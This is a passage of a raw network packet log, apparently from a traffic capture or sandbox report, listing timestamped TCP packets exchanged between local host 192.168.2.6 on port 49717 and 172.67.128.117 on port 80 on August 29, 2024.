                                    Aug 29, 2024 12:02:36.106097937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106159925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106180906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106194019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106204987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106220007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106232882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106232882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106246948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106260061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106270075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106270075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106302977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106314898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106317997 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106338024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106347084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106349945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106384993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106384993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106488943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106502056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106513977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106528044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106528044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106544018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106554031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106570959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106601000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106618881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106630087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106641054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106653929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106671095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106671095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106708050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106710911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106723070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106734037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106748104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106760025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106760025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106761932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106774092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106801033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106818914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106975079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106987953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107011080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107023001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107029915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107038975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107043982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107079983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107084036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107091904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107104063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107115984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107131958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107157946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107157946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107300997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107314110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107326031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107338905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107350111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107361078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107361078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107363939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107377052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107388973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107391119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107407093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107409000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107419968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107425928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107459068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107481003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107521057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107530117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107534885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107556105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107594967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107605934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107616901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107630968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107651949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107651949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107686043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107726097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107736111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107747078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107759953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107769966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107769966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107774019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107784986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107798100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107800007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107836008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107845068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107916117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107927084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107939005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107960939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107960939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107985973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367650986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367652893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367666006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367681026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367696047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367697954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367697954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367711067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367724895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367733955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367733955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367741108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367755890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367769957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367769957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367862940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368309021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368323088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368334055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368340969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368354082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368367910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368372917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368372917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368381023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368396044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368403912 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368408918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368421078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368432999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368437052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368437052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368447065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368468046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368499041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368504047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368511915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368525028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368541002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368545055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368552923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368582010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368582964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368601084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368621111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379334927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379369974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379383087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379410982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379424095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379440069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379453897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379451990 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379479885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379518986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379550934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379561901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379573107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379590988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379611015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379611015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379642963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379723072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379740953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379755020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379770994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379777908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379777908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379785061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379796028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379798889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379813910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379817963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379826069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379841089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379843950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379868984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379914045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379914999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379971027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379977942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379990101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380002022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380018950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380043983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380043983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380150080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380162001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380172968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380184889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380202055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380203009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380214930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380227089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380228996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380270958 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380294085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380419016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380431890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380443096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380450010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380464077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380476952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380489111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380489111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380505085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380506039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380517960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380525112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380532026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380544901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380548954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380559921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380572081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380579948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380605936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380620956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380635023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380692959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380764008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380775928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380788088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380800962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380822897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380832911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380836964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380851030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380851984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380865097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380866051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380880117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380884886 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380894899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380928040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380928040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381120920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381134033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381148100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381162882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381176949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381190062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381194115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381194115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381203890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381217003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381220102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381232023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381236076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381243944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381258965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381269932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381297112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381455898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381468058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381479025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381494999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381499052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381510019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381521940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381524086 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381536007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381546021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381550074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381565094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381578922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381582975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381582975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381591082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381613016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381650925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381833076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381844044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381855965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381869078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381882906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381886005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381886005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381895065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381906986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381920099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381921053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381934881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381939888 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381947994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381963968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381974936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381998062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381998062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382177114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382189035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382199049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382215023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382220984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382234097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382249117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382262945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382263899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382263899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382273912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382289886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382304907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382307053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382307053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382316113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382330894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382339001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382345915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382358074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382359028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382371902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382378101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382385969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382416964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382416964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416779995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416825056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416837931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416851997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416871071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416884899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416901112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416917086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416913986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416913986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416963100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416963100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470181942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470210075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470221043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470232964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470247030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470263958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470277071 CEST8049717172.67.128.117192.168.2.6
